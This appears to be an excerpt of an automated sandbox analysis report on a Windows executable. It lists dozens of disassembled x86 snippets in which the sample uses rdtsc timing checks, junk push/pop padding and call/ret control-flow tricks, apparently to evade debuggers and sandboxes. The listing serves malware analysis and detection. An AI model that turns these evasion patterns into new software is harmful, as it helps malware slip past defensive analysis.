Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F39 second address: 7D9F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF0EC6B64C6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FF0EC6B64EAh 0x00000018 jnp 00007FF0EC6B64D2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F59 second address: 7D9F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F5F second address: 7D9F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FF0EC6B64C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76705E second address: 767069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772A11 second address: 772A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E38BC second address: 7E38C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3A5D second address: 7E3A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E434C second address: 7E4350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4350 second address: 7E4354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4354 second address: 7E435A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E435A second address: 7E435F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E435F second address: 7E4393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C7Fh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF0EC517C88h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E47C3 second address: 7E47E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FF0EC6B64C6h 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FF0EC6B64C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA78 second address: 7EAA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA7E second address: 7EAA8A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA8A second address: 7EAA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA90 second address: 7EAA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA94 second address: 7EAABE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF0EC517C7Ah 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF0EC517C7Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAABE second address: 7EAAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAAC4 second address: 7EAAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF0EC517C76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAAD1 second address: 7EAAE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E95E5 second address: 7E95ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E95ED second address: 7E95F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9C9E second address: 7E9CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC517C76h 0x0000000a jmp 00007FF0EC517C86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CBE second address: 7E9CCC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CCC second address: 7E9CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CD2 second address: 7E9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9E28 second address: 7E9E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C82h 0x00000008 jmp 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9E51 second address: 7E9E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA143 second address: 7EA147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2C2 second address: 7EA2DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF0EC6B64CAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2DD second address: 7EA2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2E3 second address: 7EA2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2E7 second address: 7EA306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C89h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA306 second address: 7EA324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF0EC6B64C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FF0EC6B64CCh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792D98 second address: 792DA5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C78h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792DA5 second address: 792DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC6B64C6h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792DB6 second address: 792DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0EC517C7Bh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E910F second address: 7E9115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9115 second address: 7E911B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E911B second address: 7E912A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F13BC second address: 7F13DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F13DA second address: 7F13DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3474 second address: 7B3482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3482 second address: 792248 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF0EC6B64C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 cmc 0x00000024 lea eax, dword ptr [ebp+12497200h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF0EC6B64C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 call 00007FF0EC6B64D2h 0x00000049 stc 0x0000004a pop edi 0x0000004b jng 00007FF0EC6B64CCh 0x00000051 or edi, dword ptr [ebp+122D3BD2h] 0x00000057 push eax 0x00000058 jmp 00007FF0EC6B64CFh 0x0000005d mov dword ptr [esp], eax 0x00000060 add ch, 0000007Ah 0x00000063 call dword ptr [ebp+122D2A7Ch] 0x00000069 pushad 0x0000006a jo 00007FF0EC6B64E1h 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3596 second address: 7B359C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B39D2 second address: 7B39D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3A90 second address: 7B3A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3A95 second address: 7B3ABC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 005C1E45h 0x00000011 sub dword ptr [ebp+122D249Bh], ecx 0x00000017 call 00007FF0EC6B64C9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3ABC second address: 7B3AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3AC7 second address: 7B3AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3AE2 second address: 7B3B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FF0EC517C76h 0x00000013 popad 0x00000014 jmp 00007FF0EC517C7Dh 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FF0EC517C78h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B12 second address: 7B3B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B18 second address: 7B3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007FF0EC517C87h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FF0EC517C76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B47 second address: 7B3B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B477A second address: 792D98 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FF0EC517C78h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D25F3h], edx 0x0000002e lea eax, dword ptr [ebp+12497200h] 0x00000034 sub di, DA84h 0x00000039 push eax 0x0000003a jmp 00007FF0EC517C80h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov di, si 0x00000045 call dword ptr [ebp+122D1D2Bh] 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007FF0EC517C78h 0x00000053 push edi 0x00000054 push eax 0x00000055 pop eax 0x00000056 jnc 00007FF0EC517C76h 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F183A second address: 7F1840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C39 second address: 7F1C3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C3F second address: 7F1C49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC6B64CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1DB0 second address: 7F1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1DB6 second address: 7F1DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F49DF second address: 7F49F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jng 00007FF0EC517C76h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F46E1 second address: 7F46E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7604AF second address: 7604B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7604B3 second address: 7604CB instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64C6h 0x00000008 jbe 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FF0EC6B64C8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8B98 second address: 7F8BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF0EC517C76h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8BA3 second address: 7F8BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8BAB second address: 7F8BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCFF8 second address: 7FD00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 jnp 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD00C second address: 7FD026 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC517C76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FF0EC517C78h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD026 second address: 7FD042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD042 second address: 7FD048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD048 second address: 7FD053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD053 second address: 7FD057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9B6 second address: 75E9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9C1 second address: 75E9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9CB second address: 75E9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800A00 second address: 800A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800D27 second address: 800D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D4h 0x00000013 jp 00007FF0EC6B64C6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8067FB second address: 80680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC517C76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80699E second address: 8069A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8069A6 second address: 8069CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF0EC517C80h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8069CA second address: 8069D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4263 second address: 7B4269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4269 second address: 7B42DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF0EC6B64CBh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c cmc 0x0000002d jmp 00007FF0EC6B64D4h 0x00000032 push eax 0x00000033 js 00007FF0EC6B64DDh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF0EC6B64CFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806DEB second address: 806E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806F78 second address: 806F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80798E second address: 807994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 807994 second address: 807998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E3A1 second address: 80E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C80h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
